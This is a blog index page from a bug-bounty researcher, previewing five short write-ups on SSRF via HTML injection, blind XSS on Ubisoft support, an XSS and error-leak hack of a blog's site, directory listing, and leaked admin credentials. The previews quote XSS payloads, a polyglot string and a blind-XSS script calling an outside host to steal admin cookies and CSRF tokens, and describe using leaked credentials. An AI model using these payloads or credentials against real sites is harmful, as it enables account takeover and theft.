Posts

HTML injection to SSRF

Hey guys!
Last night I posted about HTML injection to SSRF, and some fellow researchers disagreed with my post, saying that either it came from my localhost or it was a client-based request forgery, meaning my browser was responsible for the response. You can see in the screenshot below my question and the PoC of getting the response from the program's cloud server. So this was my question and I provided the screenshot as a PoC, but again some fellow researchers said it was coming from either my localhost or the browser side. But to let you know, it is not coming from my browser: the program is using the Cloudinary service, as you can notice from the user agent, which is Cloudinary 1.0. So the whole scenario was like this: I put <img src="http://myip:port"> in the text editor, and there are four options: 1: Help, 2: Markdown, 3: Preview, 4: Save post. Before clicking on one of these we need to start netcat listening on the given port in order to get a response back. In the terminal write: nc …

UBISOFT | BLIND XSS TO CUSTOMER SUPPORT PANEL TAKEOVER

Hey folks! Hope y'all are great. I recently found an XSS in support.ubisoft.com which lets the attacker take over the customer support panel:
Vulnerability: Cross Site Scripting. Identifying the vulnerability: while I was facing a problem in WD2 I got to know about http://support.ubi.com. I opened a ticket for that, and I got the idea of why not test it out for XSS. I sent the following payload:
<script>alert("XSS POC BY HX01");</script> and boom!


Exploitation: since the web app was vulnerable to XSS, I added a payload from xsshunter.com to steal the admin cookies, CSRF token, etc.:
"><script src=https://usociety.xss.ht></script> Now time to make the victim visit the URL:


Since some of the admin cookies were HttpOnly I wasn't able to log in with them; however, thanks to XSS Hunter I was able to get the IP, the CSRF token (which could have led to compromising an agent) and some ticket information, plus some player IDs from another XSS trigger:
Reported the …

MANGOBAAZ HACKED | XSS TO CREDENTIALS EXPOSURE TO PWN

Vulnerabilities identified: XSS, improper error handling
Hey folks! Hope y'all are fine. I recently got access to a Pakistani blog, @mangobaaz, and here is the writeup of how I was able to hack into it.
INFORMATION GATHERING: while gathering information I came across a website, "hungerist.com", which was owned by MangoBaaz, and the signup page captured my attention, so I selected it to penetrate.


IDENTIFYING VULNERABILITY: I added the XSS payload in the NAME field: <script>alert("XSS BY HX01");</script> and BOOM! XSSed:

Since I was trying to steal cookies I tried another payload:

<iframe src=" jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e "></iframe> An XSS didn't trigger, but an error did:
Since it was improper error handling, it leaked some credentials :D including…

Directory Listing To Sensitive Files Exposure

Vulnerability: Directory Listing. Since the website is private and couldn't be disclosed, let's name it Redacted.com. While surfing across a website I came to know that it was vulnerable to directory listing. Since the website was using WordPress as the CMS, I knew I couldn't find much else, as it was already up to date, and I didn't find anything interesting at Redacted.com/wp-content/uploads/, so I decided to enumerate the directories manually, since I didn't have access to DirBuster at that time. I found some dirs like Redacted.com/images, Redacted.com/assets, and the fishy one, "Redacted.com/uploads". Redacted.com/uploads included a lot of images and three dirs: "stores", "shipments", "voucher":
Nothing saucy was found in "Redacted.com/uploads/stores", therefore I opened voucher and BOOM! There were some backup files (not sure of it, but they were sensitive and left public), i.e. *I don't have any other screenshots as it was not ethical to*:
 and hence this…

Recon To Admin Credentials Disclosure

Vulnerability: Information leakage due to improper error handling
It all started with a cup of tea and curiosity to hack into my mobile network provider. I usually start my recon by firing Google dorks and Sniper. Since the name of that company can't be disclosed, let's substitute it as xyz.com.

Firing this dork, inurl:xyz, I was able to get my target. The web app looks like a VPBX portal for marketing businesses and call centers:

I tried DirBuster but was not able to find anything, and only the default HTTP and HTTPS ports were open. Since nothing else was left, I tried giving Request A Free Demo a try with fake details (to avoid spam) and BOOM! This error showed up:
And this error leaked some credentials:

TIME TO EXPLOIT: Since the DB was accessible only through an internal IP, I wasn't able to exploit it; however, I got access to the company's SendGrid account, which was enough:

Best Regards, @Hx01